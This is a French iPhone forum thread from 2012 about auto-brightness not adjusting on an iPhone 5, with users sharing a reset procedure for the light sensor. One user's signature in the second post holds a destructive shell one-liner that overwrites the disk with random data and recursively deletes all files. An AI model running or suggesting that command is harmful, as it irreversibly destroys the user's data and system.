Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 01-11-2012 17:35:37

gladiator75
Membre
Inscription : 23-07-2009
Messages : 242

pb avec le capteur de luminosité ?????

Pouvez vous me confirmer que lorsque la luminiosité de l'écran est positionnée sur réglage auto, la luminosité devrait baissern lorsqu'on est dans une pièce sombre ?

merci car avec mon i5, la luminosité reste la même

Hors ligne

#2 02-11-2012 05:53:00

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

Re : pb avec le capteur de luminosité ?????

Je ne sais pas si ceci peux t'aider, mais j'ai constaté une grosse différence ( qui m'embête énormément ) avec l'arrivée d'iOS 6 dans la gestion de la luminosité.

Sur iOS 5, la barre de luminosité ne change pas : tu la règle point barre. La gestion automatique ne modifie pas la position du curseur de luminosité.
Sur iOS 6, la gestion automatique fait se déplacer le curseur, ce qui as pour effet quand je passe d'une zone éclairée à une zone sombre de laisser la barre vers les 1/4. ( alors qu'à la zone sombre, je l'avais réglé sur le minimum )

C'est très dérangeant, vu que finalement je suis obligé de tout le temps retourner dans le menu de luminosité afin de l'ajuster... Bravo Apple, ça c'est de la gestion ! Super pratique...

Sinon la luminosité se change correctement.
Fais des tests en cachant le capteur, et en l'exposant à une lumière.
Plusieurs utilisateurs d'iPhone 5 ont eu des problèmes avec le capteur de luminosité. Si celui-ci ne réagit vraiment pas, il se peux qu'il soit défaillant et que tu doive le changer en passant par la garantie.


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

#3 02-11-2012 13:25:57

kitesurf
Membre
Inscription : 26-08-2010
Messages : 137

Re : pb avec le capteur de luminosité ?????

Il y a quelque temps, quelqu'un a posté sur le forum le modus operandi pour remettre de l'ordre dans le fonctionnement de l'automatisme.
C'était du genre désactiver, mettre au minimum, mettre le téléphone dans le noir, régler, réactiver ...etc un truc dans ce style dont je ne ma souviens plus le détail, En cherchant un peu sur le forum....
En tout cas ça marchait très bien et le réglage automatique retrouvait ses marques.
Plus de problème pour moi sur mon 5 et ça marche même plutôt mieux que mon 4S sous iOS5.
Faut que je retrouve ce post pour l'appliquer à mon iPad..... LOL

Hors ligne

#4 02-11-2012 13:33:51

kitesurf
Membre
Inscription : 26-08-2010
Messages : 137

Re : pb avec le capteur de luminosité ?????

Je viens de trouver copie du message envoyé par Zirco... Je suis incapable de citer l'auteur originel, sorry...

En tout cas voilà la méthode qui marche:

"""  Bonsoir à tous
Voici la manipulation à faire pour faire fonctionner le réglage automatique de la luminosité.
Désactivez le réglage automatique de la luminosité.
Allez dans une pièce noire ( sans lumière)
Abaissez l'éclairage de l'écran jusqu'au minimum en poussant le curseur sur la gauche.
Réactivez ensuite le réglage automatique et retournez dans une pièce éclairée.
Le réglage automatique se mettra alors à fonctionner.
Voilà c'est tout.... """

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.